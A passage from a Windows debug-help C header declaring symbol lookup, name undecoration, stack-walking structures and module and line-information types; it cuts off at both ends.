__in ULONG ImageBase
);
BOOL
IMAGEAPI
UnmapDebugInformation(
__out_xcount(unknown) PIMAGE_DEBUG_INFORMATION DebugInfo
);
#endif
BOOL
IMAGEAPI
SearchTreeForFile(
__in PCSTR RootPath,
__in PCSTR InputPathName,
__out_ecount(MAX_PATH + 1) PSTR OutputPathBuffer
);
BOOL
IMAGEAPI
SearchTreeForFileW(
__in PCWSTR RootPath,
__in PCWSTR InputPathName,
__out_ecount(MAX_PATH + 1) PWSTR OutputPathBuffer
);
typedef BOOL
(CALLBACK *PENUMDIRTREE_CALLBACK)(
__in PCSTR FilePath,
__in_opt PVOID CallerData
);
BOOL
IMAGEAPI
EnumDirTree(
__in_opt HANDLE hProcess,
__in PCSTR RootPath,
__in PCSTR InputPathName,
__out_ecount_opt(MAX_PATH + 1) PSTR OutputPathBuffer,
__in_opt PENUMDIRTREE_CALLBACK cb,
__in_opt PVOID data
);
typedef BOOL
(CALLBACK *PENUMDIRTREE_CALLBACKW)(
__in PCWSTR FilePath,
__in_opt PVOID CallerData
);
BOOL
IMAGEAPI
EnumDirTreeW(
__in_opt HANDLE hProcess,
__in PCWSTR RootPath,
__in PCWSTR InputPathName,
__out_ecount_opt(MAX_PATH + 1) PWSTR OutputPathBuffer,
__in_opt PENUMDIRTREE_CALLBACKW cb,
__in_opt PVOID data
);
BOOL
IMAGEAPI
MakeSureDirectoryPathExists(
__in PCSTR DirPath
);
//
// UnDecorateSymbolName Flags
//
#define UNDNAME_COMPLETE (0x0000) // Enable full undecoration
#define UNDNAME_NO_LEADING_UNDERSCORES (0x0001) // Remove leading underscores from MS extended keywords
#define UNDNAME_NO_MS_KEYWORDS (0x0002) // Disable expansion of MS extended keywords
#define UNDNAME_NO_FUNCTION_RETURNS (0x0004) // Disable expansion of return type for primary declaration
#define UNDNAME_NO_ALLOCATION_MODEL (0x0008) // Disable expansion of the declaration model
#define UNDNAME_NO_ALLOCATION_LANGUAGE (0x0010) // Disable expansion of the declaration language specifier
#define UNDNAME_NO_MS_THISTYPE (0x0020) // NYI Disable expansion of MS keywords on the 'this' type for primary declaration
#define UNDNAME_NO_CV_THISTYPE (0x0040) // NYI Disable expansion of CV modifiers on the 'this' type for primary declaration
#define UNDNAME_NO_THISTYPE (0x0060) // Disable all modifiers on the 'this' type
#define UNDNAME_NO_ACCESS_SPECIFIERS (0x0080) // Disable expansion of access specifiers for members
#define UNDNAME_NO_THROW_SIGNATURES (0x0100) // Disable expansion of 'throw-signatures' for functions and pointers to functions
#define UNDNAME_NO_MEMBER_TYPE (0x0200) // Disable expansion of 'static' or 'virtual'ness of members
#define UNDNAME_NO_RETURN_UDT_MODEL (0x0400) // Disable expansion of MS model for UDT returns
#define UNDNAME_32_BIT_DECODE (0x0800) // Undecorate 32-bit decorated names
#define UNDNAME_NAME_ONLY (0x1000) // Crack only the name for primary declaration;
// return just [scope::]name. Does expand template params
#define UNDNAME_NO_ARGUMENTS (0x2000) // Don't undecorate arguments to function
#define UNDNAME_NO_SPECIAL_SYMS (0x4000) // Don't undecorate special names (v-table, vcall, vector xxx, metatype, etc)
DWORD
IMAGEAPI
WINAPI
UnDecorateSymbolName(
__in PCSTR name,
__out_ecount(maxStringLength) PSTR outputString,
__in DWORD maxStringLength,
__in DWORD flags
);
DWORD
IMAGEAPI
WINAPI
UnDecorateSymbolNameW(
__in PCWSTR name,
__out_ecount(maxStringLength) PWSTR outputString,
__in DWORD maxStringLength,
__in DWORD flags
);
//
// these values are used for synthesized file types
// that can be passed in as image headers instead of
// the standard ones from ntimage.h
//
#define DBHHEADER_DEBUGDIRS 0x1
#define DBHHEADER_CVMISC 0x2
#define DBHHEADER_PDBGUID 0x3
typedef struct _MODLOAD_DATA {
DWORD ssize; // size of this struct
DWORD ssig; // signature identifying the passed data
PVOID data; // pointer to passed data
DWORD size; // size of passed data
DWORD flags; // options
} MODLOAD_DATA, *PMODLOAD_DATA;
typedef struct _MODLOAD_CVMISC {
DWORD oCV; // ofset to the codeview record
size_t cCV; // size of the codeview record
DWORD oMisc; // offset to the misc record
size_t cMisc; // size of the misc record
DWORD dtImage; // datetime stamp of the image
DWORD cImage; // size of the image
} MODLOAD_CVMISC, *PMODLOAD_CVMISC;
typedef struct _MODLOAD_PDBGUID_PDBAGE {
GUID PdbGuid; // Pdb Guid
DWORD PdbAge; // Pdb Age
} MODLOAD_PDBGUID_PDBAGE, *PMODLOAD_PDBGUID_PDBAGE;
//
// StackWalking API
//
typedef enum {
AddrMode1616,
AddrMode1632,
AddrModeReal,
AddrModeFlat
} ADDRESS_MODE;
typedef struct _tagADDRESS64 {
DWORD64 Offset;
WORD Segment;
ADDRESS_MODE Mode;
} ADDRESS64, *LPADDRESS64;
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define ADDRESS ADDRESS64
#define LPADDRESS LPADDRESS64
#else
typedef struct _tagADDRESS {
DWORD Offset;
WORD Segment;
ADDRESS_MODE Mode;
} ADDRESS, *LPADDRESS;
__inline
void
Address32To64(
__in LPADDRESS a32,
__out LPADDRESS64 a64
)
{
a64->Offset = (ULONG64)(LONG64)(LONG)a32->Offset;
a64->Segment = a32->Segment;
a64->Mode = a32->Mode;
}
__inline
void
Address64To32(
__in LPADDRESS64 a64,
__out LPADDRESS a32
)
{
a32->Offset = (ULONG)a64->Offset;
a32->Segment = a64->Segment;
a32->Mode = a64->Mode;
}
#endif
//
// This structure is included in the STACKFRAME structure,
// and is used to trace through usermode callbacks in a thread's
// kernel stack. The values must be copied by the kernel debugger
// from the DBGKD_GET_VERSION and WAIT_STATE_CHANGE packets.
//
//
// New KDHELP structure for 64 bit system support.
// This structure is preferred in new code.
//
typedef struct _KDHELP64 {
//
// address of kernel thread object, as provided in the
// WAIT_STATE_CHANGE packet.
//
DWORD64 Thread;
//
// offset in thread object to pointer to the current callback frame
// in kernel stack.
//
DWORD ThCallbackStack;
//
// offset in thread object to pointer to the current callback backing
// store frame in kernel stack.
//
DWORD ThCallbackBStore;
//
// offsets to values in frame:
//
// address of next callback frame
DWORD NextCallback;
// address of saved frame pointer (if applicable)
DWORD FramePointer;
//
// Address of the kernel function that calls out to user mode
//
DWORD64 KiCallUserMode;
//
// Address of the user mode dispatcher function
//
DWORD64 KeUserCallbackDispatcher;
//
// Lowest kernel mode address
//
DWORD64 SystemRangeStart;
//
// Address of the user mode exception dispatcher function.
// Added in API version 10.
//
DWORD64 KiUserExceptionDispatcher;
//
// Stack bounds, added in API version 11.
//
DWORD64 StackBase;
DWORD64 StackLimit;
DWORD64 Reserved[5];
} KDHELP64, *PKDHELP64;
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define KDHELP KDHELP64
#define PKDHELP PKDHELP64
#else
typedef struct _KDHELP {
//
// address of kernel thread object, as provided in the
// WAIT_STATE_CHANGE packet.
//
DWORD Thread;
//
// offset in thread object to pointer to the current callback frame
// in kernel stack.
//
DWORD ThCallbackStack;
//
// offsets to values in frame:
//
// address of next callback frame
DWORD NextCallback;
// address of saved frame pointer (if applicable)
DWORD FramePointer;
//
// Address of the kernel function that calls out to user mode
//
DWORD KiCallUserMode;
//
// Address of the user mode dispatcher function
//
DWORD KeUserCallbackDispatcher;
//
// Lowest kernel mode address
//
DWORD SystemRangeStart;
//
// offset in thread object to pointer to the current callback backing
// store frame in kernel stack.
//
DWORD ThCallbackBStore;
//
// Address of the user mode exception dispatcher function.
// Added in API version 10.
//
DWORD KiUserExceptionDispatcher;
//
// Stack bounds, added in API version 11.
//
DWORD StackBase;
DWORD StackLimit;
DWORD Reserved[5];
} KDHELP, *PKDHELP;
__inline
void
KdHelp32To64(
__in PKDHELP p32,
__out PKDHELP64 p64
)
{
p64->Thread = p32->Thread;
p64->ThCallbackStack = p32->ThCallbackStack;
p64->NextCallback = p32->NextCallback;
p64->FramePointer = p32->FramePointer;
p64->KiCallUserMode = p32->KiCallUserMode;
p64->KeUserCallbackDispatcher = p32->KeUserCallbackDispatcher;
p64->SystemRangeStart = p32->SystemRangeStart;
p64->KiUserExceptionDispatcher = p32->KiUserExceptionDispatcher;
p64->StackBase = p32->StackBase;
p64->StackLimit = p32->StackLimit;
}
#endif
typedef struct _tagSTACKFRAME64 {
ADDRESS64 AddrPC; // program counter
ADDRESS64 AddrReturn; // return address
ADDRESS64 AddrFrame; // frame pointer
ADDRESS64 AddrStack; // stack pointer
ADDRESS64 AddrBStore; // backing store pointer
PVOID FuncTableEntry; // pointer to pdata/fpo or NULL
DWORD64 Params[4]; // possible arguments to the function
BOOL Far; // WOW far call
BOOL Virtual; // is this a virtual frame?
DWORD64 Reserved[3];
KDHELP64 KdHelp;
} STACKFRAME64, *LPSTACKFRAME64;
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define STACKFRAME STACKFRAME64
#define LPSTACKFRAME LPSTACKFRAME64
#else
typedef struct _tagSTACKFRAME {
ADDRESS AddrPC; // program counter
ADDRESS AddrReturn; // return address
ADDRESS AddrFrame; // frame pointer
ADDRESS AddrStack; // stack pointer
PVOID FuncTableEntry; // pointer to pdata/fpo or NULL
DWORD Params[4]; // possible arguments to the function
BOOL Far; // WOW far call
BOOL Virtual; // is this a virtual frame?
DWORD Reserved[3];
KDHELP KdHelp;
ADDRESS AddrBStore; // backing store pointer
} STACKFRAME, *LPSTACKFRAME;
#endif
typedef
BOOL
(__stdcall *PREAD_PROCESS_MEMORY_ROUTINE64)(
__in HANDLE hProcess,
__in DWORD64 qwBaseAddress,
__out_bcount(nSize) PVOID lpBuffer,
__in DWORD nSize,
__out LPDWORD lpNumberOfBytesRead
);
typedef
PVOID
(__stdcall *PFUNCTION_TABLE_ACCESS_ROUTINE64)(
__in HANDLE ahProcess,
__in DWORD64 AddrBase
);
typedef
DWORD64
(__stdcall *PGET_MODULE_BASE_ROUTINE64)(
__in HANDLE hProcess,
__in DWORD64 Address
);
typedef
DWORD64
(__stdcall *PTRANSLATE_ADDRESS_ROUTINE64)(
__in HANDLE hProcess,
__in HANDLE hThread,
__in LPADDRESS64 lpaddr
);
BOOL
IMAGEAPI
StackWalk64(
__in DWORD MachineType,
__in HANDLE hProcess,
__in HANDLE hThread,
__inout LPSTACKFRAME64 StackFrame,
__inout PVOID ContextRecord,
__in_opt PREAD_PROCESS_MEMORY_ROUTINE64 ReadMemoryRoutine,
__in_opt PFUNCTION_TABLE_ACCESS_ROUTINE64 FunctionTableAccessRoutine,
__in_opt PGET_MODULE_BASE_ROUTINE64 GetModuleBaseRoutine,
__in_opt PTRANSLATE_ADDRESS_ROUTINE64 TranslateAddress
);
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define PREAD_PROCESS_MEMORY_ROUTINE PREAD_PROCESS_MEMORY_ROUTINE64
#define PFUNCTION_TABLE_ACCESS_ROUTINE PFUNCTION_TABLE_ACCESS_ROUTINE64
#define PGET_MODULE_BASE_ROUTINE PGET_MODULE_BASE_ROUTINE64
#define PTRANSLATE_ADDRESS_ROUTINE PTRANSLATE_ADDRESS_ROUTINE64
#define StackWalk StackWalk64
#else
typedef
BOOL
(__stdcall *PREAD_PROCESS_MEMORY_ROUTINE)(
__in HANDLE hProcess,
__in DWORD lpBaseAddress,
__out_bcount(nSize) PVOID lpBuffer,
__in DWORD nSize,
__out PDWORD lpNumberOfBytesRead
);
typedef
PVOID
(__stdcall *PFUNCTION_TABLE_ACCESS_ROUTINE)(
__in HANDLE hProcess,
__in DWORD AddrBase
);
typedef
DWORD
(__stdcall *PGET_MODULE_BASE_ROUTINE)(
__in HANDLE hProcess,
__in DWORD Address
);
typedef
DWORD
(__stdcall *PTRANSLATE_ADDRESS_ROUTINE)(
__in HANDLE hProcess,
__in HANDLE hThread,
__out LPADDRESS lpaddr
);
BOOL
IMAGEAPI
StackWalk(
DWORD MachineType,
__in HANDLE hProcess,
__in HANDLE hThread,
__inout LPSTACKFRAME StackFrame,
__inout PVOID ContextRecord,
__in_opt PREAD_PROCESS_MEMORY_ROUTINE ReadMemoryRoutine,
__in_opt PFUNCTION_TABLE_ACCESS_ROUTINE FunctionTableAccessRoutine,
__in_opt PGET_MODULE_BASE_ROUTINE GetModuleBaseRoutine,
__in_opt PTRANSLATE_ADDRESS_ROUTINE TranslateAddress
);
#endif
#define API_VERSION_NUMBER 11
typedef struct API_VERSION {
USHORT MajorVersion;
USHORT MinorVersion;
USHORT Revision;
USHORT Reserved;
} API_VERSION, *LPAPI_VERSION;
LPAPI_VERSION
IMAGEAPI
ImagehlpApiVersion(
VOID
);
LPAPI_VERSION
IMAGEAPI
ImagehlpApiVersionEx(
__in LPAPI_VERSION AppVersion
);
DWORD
IMAGEAPI
GetTimestampForLoadedLibrary(
__in HMODULE Module
);
//
// typedefs for function pointers
//
typedef BOOL
(CALLBACK *PSYM_ENUMMODULES_CALLBACK64)(
__in PCSTR ModuleName,
__in DWORD64 BaseOfDll,
__in_opt PVOID UserContext
);
typedef BOOL
(CALLBACK *PSYM_ENUMMODULES_CALLBACKW64)(
__in PCWSTR ModuleName,
__in DWORD64 BaseOfDll,
__in_opt PVOID UserContext
);
typedef BOOL
(CALLBACK *PENUMLOADED_MODULES_CALLBACK64)(
__in PCSTR ModuleName,
__in DWORD64 ModuleBase,
__in ULONG ModuleSize,
__in_opt PVOID UserContext
);
typedef BOOL
(CALLBACK *PENUMLOADED_MODULES_CALLBACKW64)(
__in PCWSTR ModuleName,
__in DWORD64 ModuleBase,
__in ULONG ModuleSize,
__in_opt PVOID UserContext
);
typedef BOOL
(CALLBACK *PSYM_ENUMSYMBOLS_CALLBACK64)(
__in PCSTR SymbolName,
__in DWORD64 SymbolAddress,
__in ULONG SymbolSize,
__in_opt PVOID UserContext
);
typedef BOOL
(CALLBACK *PSYM_ENUMSYMBOLS_CALLBACK64W)(
__in PCWSTR SymbolName,
__in DWORD64 SymbolAddress,
__in ULONG SymbolSize,
__in_opt PVOID UserContext
);
typedef BOOL
(CALLBACK *PSYMBOL_REGISTERED_CALLBACK64)(
__in HANDLE hProcess,
__in ULONG ActionCode,
__in_opt ULONG64 CallbackData,
__in_opt ULONG64 UserContext
);
typedef
PVOID
(CALLBACK *PSYMBOL_FUNCENTRY_CALLBACK)(
__in HANDLE hProcess,
__in DWORD AddrBase,
__in_opt PVOID UserContext
);
typedef
PVOID
(CALLBACK *PSYMBOL_FUNCENTRY_CALLBACK64)(
__in HANDLE hProcess,
__in ULONG64 AddrBase,
__in ULONG64 UserContext
);
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define PSYM_ENUMMODULES_CALLBACK PSYM_ENUMMODULES_CALLBACK64
#define PSYM_ENUMSYMBOLS_CALLBACK PSYM_ENUMSYMBOLS_CALLBACK64
#define PSYM_ENUMSYMBOLS_CALLBACKW PSYM_ENUMSYMBOLS_CALLBACK64W
#define PENUMLOADED_MODULES_CALLBACK PENUMLOADED_MODULES_CALLBACK64
#define PSYMBOL_REGISTERED_CALLBACK PSYMBOL_REGISTERED_CALLBACK64
#define PSYMBOL_FUNCENTRY_CALLBACK PSYMBOL_FUNCENTRY_CALLBACK64
#else
typedef BOOL
(CALLBACK *PSYM_ENUMMODULES_CALLBACK)(
__in PCSTR ModuleName,
__in ULONG BaseOfDll,
__in_opt PVOID UserContext
);
typedef BOOL
(CALLBACK *PSYM_ENUMSYMBOLS_CALLBACK)(
__in PCSTR SymbolName,
__in ULONG SymbolAddress,
__in ULONG SymbolSize,
__in_opt PVOID UserContext
);
typedef BOOL
(CALLBACK *PSYM_ENUMSYMBOLS_CALLBACKW)(
__in PCWSTR SymbolName,
__in ULONG SymbolAddress,
__in ULONG SymbolSize,
__in_opt PVOID UserContext
);
typedef BOOL
(CALLBACK *PENUMLOADED_MODULES_CALLBACK)(
__in PCSTR ModuleName,
__in ULONG ModuleBase,
__in ULONG ModuleSize,
__in_opt PVOID UserContext
);
typedef BOOL
(CALLBACK *PSYMBOL_REGISTERED_CALLBACK)(
__in HANDLE hProcess,
__in ULONG ActionCode,
__in_opt PVOID CallbackData,
__in_opt PVOID UserContext
);
#endif
// values found in SYMBOL_INFO.Tag
//
// This was taken from cvconst.h and should
// not override any values found there.
//
// #define _NO_CVCONST_H_ if you don't
// have access to that file...
#ifdef _NO_CVCONST_H
// DIA enums
enum SymTagEnum
{
SymTagNull,
SymTagExe,
SymTagCompiland,
SymTagCompilandDetails,
SymTagCompilandEnv,
SymTagFunction,
SymTagBlock,
SymTagData,
SymTagAnnotation,
SymTagLabel,
SymTagPublicSymbol,
SymTagUDT,
SymTagEnum,
SymTagFunctionType,
SymTagPointerType,
SymTagArrayType,
SymTagBaseType,
SymTagTypedef,
SymTagBaseClass,
SymTagFriend,
SymTagFunctionArgType,
SymTagFuncDebugStart,
SymTagFuncDebugEnd,
SymTagUsingNamespace,
SymTagVTableShape,
SymTagVTable,
SymTagCustom,
SymTagThunk,
SymTagCustomType,
SymTagManagedType,
SymTagDimension,
SymTagMax
};
#endif
//
// flags found in SYMBOL_INFO.Flags
//
#define SYMFLAG_VALUEPRESENT 0x00000001
#define SYMFLAG_REGISTER 0x00000008
#define SYMFLAG_REGREL 0x00000010
#define SYMFLAG_FRAMEREL 0x00000020
#define SYMFLAG_PARAMETER 0x00000040
#define SYMFLAG_LOCAL 0x00000080
#define SYMFLAG_CONSTANT 0x00000100
#define SYMFLAG_EXPORT 0x00000200
#define SYMFLAG_FORWARDER 0x00000400
#define SYMFLAG_FUNCTION 0x00000800
#define SYMFLAG_VIRTUAL 0x00001000
#define SYMFLAG_THUNK 0x00002000
#define SYMFLAG_TLSREL 0x00004000
#define SYMFLAG_SLOT 0x00008000
#define SYMFLAG_ILREL 0x00010000
#define SYMFLAG_METADATA 0x00020000
#define SYMFLAG_CLR_TOKEN 0x00040000
// this resets SymNext/Prev to the beginning
// of the module passed in the address field
#define SYMFLAG_RESET 0x80000000
//
// symbol type enumeration
//
typedef enum {
SymNone = 0,
SymCoff,
SymCv,
SymPdb,
SymExport,
SymDeferred,
SymSym, // .sym file
SymDia,
SymVirtual,
NumSymTypes
} SYM_TYPE;
//
// symbol data structure
//
typedef struct _IMAGEHLP_SYMBOL64 {
DWORD SizeOfStruct; // set to sizeof(IMAGEHLP_SYMBOL64)
DWORD64 Address; // virtual address including dll base address
DWORD Size; // estimated size of symbol, can be zero
DWORD Flags; // info about the symbols, see the SYMF defines
DWORD MaxNameLength; // maximum size of symbol name in 'Name'
CHAR Name[1]; // symbol name (null terminated string)
} IMAGEHLP_SYMBOL64, *PIMAGEHLP_SYMBOL64;
typedef struct _IMAGEHLP_SYMBOL64_PACKAGE {
IMAGEHLP_SYMBOL64 sym;
CHAR name[MAX_SYM_NAME + 1];
} IMAGEHLP_SYMBOL64_PACKAGE, *PIMAGEHLP_SYMBOL64_PACKAGE;
typedef struct _IMAGEHLP_SYMBOLW64 {
DWORD SizeOfStruct; // set to sizeof(IMAGEHLP_SYMBOLW64)
DWORD64 Address; // virtual address including dll base address
DWORD Size; // estimated size of symbol, can be zero
DWORD Flags; // info about the symbols, see the SYMF defines
DWORD MaxNameLength; // maximum size of symbol name in 'Name'
WCHAR Name[1]; // symbol name (null terminated string)
} IMAGEHLP_SYMBOLW64, *PIMAGEHLP_SYMBOLW64;
typedef struct _IMAGEHLP_SYMBOLW64_PACKAGE {
IMAGEHLP_SYMBOLW64 sym;
WCHAR name[MAX_SYM_NAME + 1];
} IMAGEHLP_SYMBOLW64_PACKAGE, *PIMAGEHLP_SYMBOLW64_PACKAGE;
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define IMAGEHLP_SYMBOL IMAGEHLP_SYMBOL64
#define PIMAGEHLP_SYMBOL PIMAGEHLP_SYMBOL64
#define IMAGEHLP_SYMBOL_PACKAGE IMAGEHLP_SYMBOL64_PACKAGE
#define PIMAGEHLP_SYMBOL_PACKAGE PIMAGEHLP_SYMBOL64_PACKAGE
#define IMAGEHLP_SYMBOLW IMAGEHLP_SYMBOLW64
#define PIMAGEHLP_SYMBOLW PIMAGEHLP_SYMBOLW64
#define IMAGEHLP_SYMBOLW_PACKAGE IMAGEHLP_SYMBOLW64_PACKAGE
#define PIMAGEHLP_SYMBOLW_PACKAGE PIMAGEHLP_SYMBOLW64_PACKAGE
#else
typedef struct _IMAGEHLP_SYMBOL {
DWORD SizeOfStruct; // set to sizeof(IMAGEHLP_SYMBOL)
DWORD Address; // virtual address including dll base address
DWORD Size; // estimated size of symbol, can be zero
DWORD Flags; // info about the symbols, see the SYMF defines
DWORD MaxNameLength; // maximum size of symbol name in 'Name'
CHAR Name[1]; // symbol name (null terminated string)
} IMAGEHLP_SYMBOL, *PIMAGEHLP_SYMBOL;
typedef struct _IMAGEHLP_SYMBOL_PACKAGE {
IMAGEHLP_SYMBOL sym;
CHAR name[MAX_SYM_NAME + 1];
} IMAGEHLP_SYMBOL_PACKAGE, *PIMAGEHLP_SYMBOL_PACKAGE;
typedef struct _IMAGEHLP_SYMBOLW {
DWORD SizeOfStruct; // set to sizeof(IMAGEHLP_SYMBOLW)
DWORD Address; // virtual address including dll base address
DWORD Size; // estimated size of symbol, can be zero
DWORD Flags; // info about the symbols, see the SYMF defines
DWORD MaxNameLength; // maximum size of symbol name in 'Name'
WCHAR Name[1]; // symbol name (null terminated string)
} IMAGEHLP_SYMBOLW, *PIMAGEHLP_SYMBOLW;
typedef struct _IMAGEHLP_SYMBOLW_PACKAGE {
IMAGEHLP_SYMBOLW sym;
WCHAR name[MAX_SYM_NAME + 1];
} IMAGEHLP_SYMBOLW_PACKAGE, *PIMAGEHLP_SYMBOLW_PACKAGE;
#endif
//
// module data structure
//
typedef struct _IMAGEHLP_MODULE64 {
DWORD SizeOfStruct; // set to sizeof(IMAGEHLP_MODULE64)
DWORD64 BaseOfImage; // base load address of module
DWORD ImageSize; // virtual size of the loaded module
DWORD TimeDateStamp; // date/time stamp from pe header
DWORD CheckSum; // checksum from the pe header
DWORD NumSyms; // number of symbols in the symbol table
SYM_TYPE SymType; // type of symbols loaded
CHAR ModuleName[32]; // module name
CHAR ImageName[256]; // image name
CHAR LoadedImageName[256]; // symbol file name
// new elements: 07-Jun-2002
CHAR LoadedPdbName[256]; // pdb file name
DWORD CVSig; // Signature of the CV record in the debug directories
CHAR CVData[MAX_PATH * 3]; // Contents of the CV record
DWORD PdbSig; // Signature of PDB
GUID PdbSig70; // Signature of PDB (VC 7 and up)
DWORD PdbAge; // DBI age of pdb
BOOL PdbUnmatched; // loaded an unmatched pdb
BOOL DbgUnmatched; // loaded an unmatched dbg
BOOL LineNumbers; // we have line number information
BOOL GlobalSymbols; // we have internal symbol information
BOOL TypeInfo; // we have type information
// new elements: 17-Dec-2003
BOOL SourceIndexed; // pdb supports source server
BOOL Publics; // contains public symbols
} IMAGEHLP_MODULE64, *PIMAGEHLP_MODULE64;
typedef struct _IMAGEHLP_MODULEW64 {
DWORD SizeOfStruct; // set to sizeof(IMAGEHLP_MODULE64)
DWORD64 BaseOfImage; // base load address of module
DWORD ImageSize; // virtual size of the loaded module
DWORD TimeDateStamp; // date/time stamp from pe header
DWORD CheckSum; // checksum from the pe header
DWORD NumSyms; // number of symbols in the symbol table
SYM_TYPE SymType; // type of symbols loaded
WCHAR ModuleName[32]; // module name
WCHAR ImageName[256]; // image name
// new elements: 07-Jun-2002
WCHAR LoadedImageName[256]; // symbol file name
WCHAR LoadedPdbName[256]; // pdb file name
DWORD CVSig; // Signature of the CV record in the debug directories
WCHAR CVData[MAX_PATH * 3]; // Contents of the CV record
DWORD PdbSig; // Signature of PDB
GUID PdbSig70; // Signature of PDB (VC 7 and up)
DWORD PdbAge; // DBI age of pdb
BOOL PdbUnmatched; // loaded an unmatched pdb
BOOL DbgUnmatched; // loaded an unmatched dbg
BOOL LineNumbers; // we have line number information
BOOL GlobalSymbols; // we have internal symbol information
BOOL TypeInfo; // we have type information
// new elements: 17-Dec-2003
BOOL SourceIndexed; // pdb supports source server
BOOL Publics; // contains public symbols
} IMAGEHLP_MODULEW64, *PIMAGEHLP_MODULEW64;
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define IMAGEHLP_MODULE IMAGEHLP_MODULE64
#define PIMAGEHLP_MODULE PIMAGEHLP_MODULE64
#define IMAGEHLP_MODULEW IMAGEHLP_MODULEW64
#define PIMAGEHLP_MODULEW PIMAGEHLP_MODULEW64
#else
typedef struct _IMAGEHLP_MODULE {
DWORD SizeOfStruct; // set to sizeof(IMAGEHLP_MODULE)
DWORD BaseOfImage; // base load address of module
DWORD ImageSize; // virtual size of the loaded module
DWORD TimeDateStamp; // date/time stamp from pe header
DWORD CheckSum; // checksum from the pe header
DWORD NumSyms; // number of symbols in the symbol table
SYM_TYPE SymType; // type of symbols loaded
CHAR ModuleName[32]; // module name
CHAR ImageName[256]; // image name
CHAR LoadedImageName[256]; // symbol file name
} IMAGEHLP_MODULE, *PIMAGEHLP_MODULE;
typedef struct _IMAGEHLP_MODULEW {
DWORD SizeOfStruct; // set to sizeof(IMAGEHLP_MODULE)
DWORD BaseOfImage; // base load address of module
DWORD ImageSize; // virtual size of the loaded module
DWORD TimeDateStamp; // date/time stamp from pe header
DWORD CheckSum; // checksum from the pe header
DWORD NumSyms; // number of symbols in the symbol table
SYM_TYPE SymType; // type of symbols loaded
WCHAR ModuleName[32]; // module name
WCHAR ImageName[256]; // image name
WCHAR LoadedImageName[256]; // symbol file name
} IMAGEHLP_MODULEW, *PIMAGEHLP_MODULEW;
#endif
//
// source file line data structure
//
typedef struct _IMAGEHLP_LINE64 {
DWORD SizeOfStruct; // set to sizeof(IMAGEHLP_LINE64)
PVOID Key; // internal
DWORD LineNumber; // line number in file
PCHAR FileName; // full filename
DWORD64 Address; // first instruction of line
} IMAGEHLP_LINE64, *PIMAGEHLP_LINE64;
typedef struct _IMAGEHLP_LINEW64 {
DWORD SizeOfStruct; // set to sizeof(IMAGEHLP_LINE64)
PVOID Key; // internal
DWORD LineNumber; // line number in file
PWSTR FileName; // full filename
DWORD64 Address; // first instruction of line
} IMAGEHLP_LINEW64, *PIMAGEHLP_LINEW64;
#if !defined(_IMAGEHLP_SOURCE_) && defined(_IMAGEHLP64)
#define IMAGEHLP_LINE IMAGEHLP_LINE64
#define PIMAGEHLP_LINE PIMAGEHLP_LINE64
#else
typedef struct _IMAGEHLP_LINE {
DWORD SizeOfStruct; // set to sizeof(IMAGEHLP_LINE)
PVOID Key; // internal
DWORD LineNumber; // line number in file
PCHAR FileName; // full filename
DWORD Address; // first instruction of line
} IMAGEHLP_LINE, *PIMAGEHLP_LINE;
typedef struct _IMAGEHLP_LINEW {
DWORD SizeOfStruct; // set to sizeof(IMAGEHLP_LINE64)
PVOID Key; // internal
DWORD LineNumber; // line number in file
PCHAR FileName; // full filename
DWORD64 Address; // first instruction of line
} IMAGEHLP_LINEW, *PIMAGEHLP_LINEW;
#endif
//
// source file structure
//
typedef struct _SOURCEFILE {
DWORD64 ModBase; // base address of loaded module
PCHAR FileName; // full filename of source
} SOURCEFILE, *PSOURCEFILE;
typedef struct _SOURCEFILEW {
DWORD64 ModBase; // base address of loaded module
PWSTR FileName; // full filename of source
} SOURCEFILEW, *PSOURCEFILEW;
//
// data structures used for registered symbol callbacks
//
#define CBA_DEFERRED_SYMBOL_LOAD_START 0x00000001
#define CBA_DEFERRED_SYMBOL_LOAD_COMPLETE 0x00000002
#define CBA_DEFERRED_SYMBOL_LOAD_FAILURE 0x00000003
#define CBA_SYMBOLS_UNLOADED 0x00000004
#define CBA_DUPLICATE_SYMBOL 0x00000005
#define CBA_READ_MEMORY 0x00000006
#define CBA_DEFERRED_SYMBOL_LOAD_CANCEL 0x00000007
#define CBA_SET_OPTIONS 0x00000008
#define CBA_EVENT 0x00000010
#define CBA_DEFERRED_SYMBOL_LOAD_PARTIAL 0x00000020
#define CBA_DEBUG_INFO 0x10000000
#define CBA_SRCSRV_INFO 0x20000000
#define CBA_SRCSRV_EVENT 0x40000000
typedef struct _IMAGEHLP_CBA_READ_MEMORY {
DWORD64 addr; // address to read from
PVOID buf; // buffer to read to
DWORD bytes; // amount of bytes to read
DWORD *bytesread; // pointer to store amount of bytes read
} IMAGEHLP_CBA_READ_MEMORY, *PIMAGEHLP_CBA_READ_MEMORY;
enum {
sevInfo = 0,
sevProblem,
sevAttn,
sevFatal,
sevMax // unused
};
#define EVENT_SRCSPEW_START 100
#define EVENT_SRCSPEW 100
#define EVENT_SRCSPEW_END 199
typedef struct _IMAGEHLP_CBA_EVENT {
DWORD severity; // values from sevInfo to sevFatal
DWORD code; // numerical code IDs the error
PCHAR desc; // may contain a text description of the error
PVOID object; // value dependant upon the error code
} IMAGEHLP_CBA_EVENT, *PIMAGEHLP_CBA_EVENT;
typedef struct _IMAGEHLP_CBA_EVENTW {
DWORD severity; // values from sevInfo to sevFatal
DWORD code; // numerical code IDs the error
PCWSTR desc; // may contain a text description of the error
PVOID object; // value dependant upon the error code
} IMAGEHLP_CBA_EVENTW, *PIMAGEHLP_CBA_EVENTW;
typedef struct _IMAGEHLP_DEFERRED_SYMBOL_LOAD64 {
DWORD SizeOfStruct; // set to sizeof(IMAGEHLP_DEFERRED_SYMBOL_LOAD64)
DWORD64 BaseOfImage; // base load address of module
DWORD CheckSum; // checksum from the pe header
DWORD TimeDateStamp; // date/time stamp from pe header
CHAR FileName[MAX_PATH]; // symbols file or image name
BOOLEAN Reparse; // load failure reparse
HANDLE hFile; // file handle, if passed
DWORD Flags; //
} IMAGEHLP_DEFERRED_SYMBOL_LOAD64, *PIMAGEHLP_DEFERRED_SYMBOL_LOAD64;
typedef struct _IMAGEHLP_DEFERRED_SYMBOL_LOADW64 {
